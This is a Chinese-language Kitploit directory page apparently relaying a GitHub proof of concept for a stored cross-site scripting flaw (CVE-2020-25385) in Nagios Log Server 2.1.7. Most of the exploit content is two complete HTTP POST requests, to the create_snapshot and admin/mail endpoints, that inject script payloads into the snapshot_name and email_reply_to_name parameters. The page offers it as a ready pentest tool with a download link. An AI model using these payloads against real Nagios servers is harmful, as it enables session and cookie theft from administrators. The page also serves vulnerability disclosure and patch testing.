Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting — Nagios Log Server 2.1.7 中存在一个存储型跨站脚本(XSS)漏洞,攻击者可借此对打开恶意构造的链接或第三方网页的用户执行恶意操作。 | Kitploit
工具/GitHubGitHub/emreovunc/nagios-log-server-2.1.7-persistent-cross-site-scripting
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubemreovunc/nagios-log-server-2.1.7-persistent-cross-site-scripting

Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting

Nagios Log Server 2.1.7 中存在一个存储型跨站脚本(XSS)漏洞,攻击者可借此对打开恶意构造的链接或第三方网页的用户执行恶意操作。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
325年前尚未审核
分享

Nagios-Log-Server-2.1.7-持久性跨站脚本

在 Nagios Log Server 2.1.7 中存在一个存储型跨站脚本(XSS)漏洞,攻击者可利用该漏洞对打开恶意构造链接或第三方网页的用户执行恶意操作。

Nagios Log Server 2.1.7 及更早版本受这些漏洞影响。

CVE-2020-25385

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25385

PoC-1

要利用该漏洞,可向 '/nagioslogserver/configure/create_snapshot' 发送 POST 请求,通过操纵请求体中的 'snapshot_name' 参数,影响打开恶意构造链接或第三方网页的用户。

root@kitploit:~
POST /nagioslogserver/configure/create_snapshot HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
DNT: 1
Connection: close
Cookie: csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd; ls_session=883lergotgcjbh9bjgaeakosv5go2gbb; PHPSESSID=nbah0vkmibpudd1qh7qgnpgo53
Upgrade-Insecure-Requests: 1

csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd&snapshot_name=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E

PoC-2

要利用该漏洞,可向 '/nagioslogserver/admin/mail' 发送 POST 请求,通过操纵请求体中的 'email_reply_to_name' 参数,影响打开恶意构造链接或第三方网页的用户。

root@kitploit:~
POST /nagioslogserver/admin/mail HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 291
DNT: 1
Connection: close
Cookie: csrf_ls=6e418c757282ab5c4785dad327238158; ls_session=pscogfricmnpe9kpvbtcuccn8mfempgp
Upgrade-Insecure-Requests: 1

csrf_ls=6e418c757282ab5c4785dad327238158&email_from_name=Nagios+Log+Server&email_from=root%40localhost&email_reply_to_name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email_reply_to=root%40localhost&email_method=mail&smtp_host=&smtp_crypto=&smtp_port=25&smtp_user=&smtp_pass=

下载工具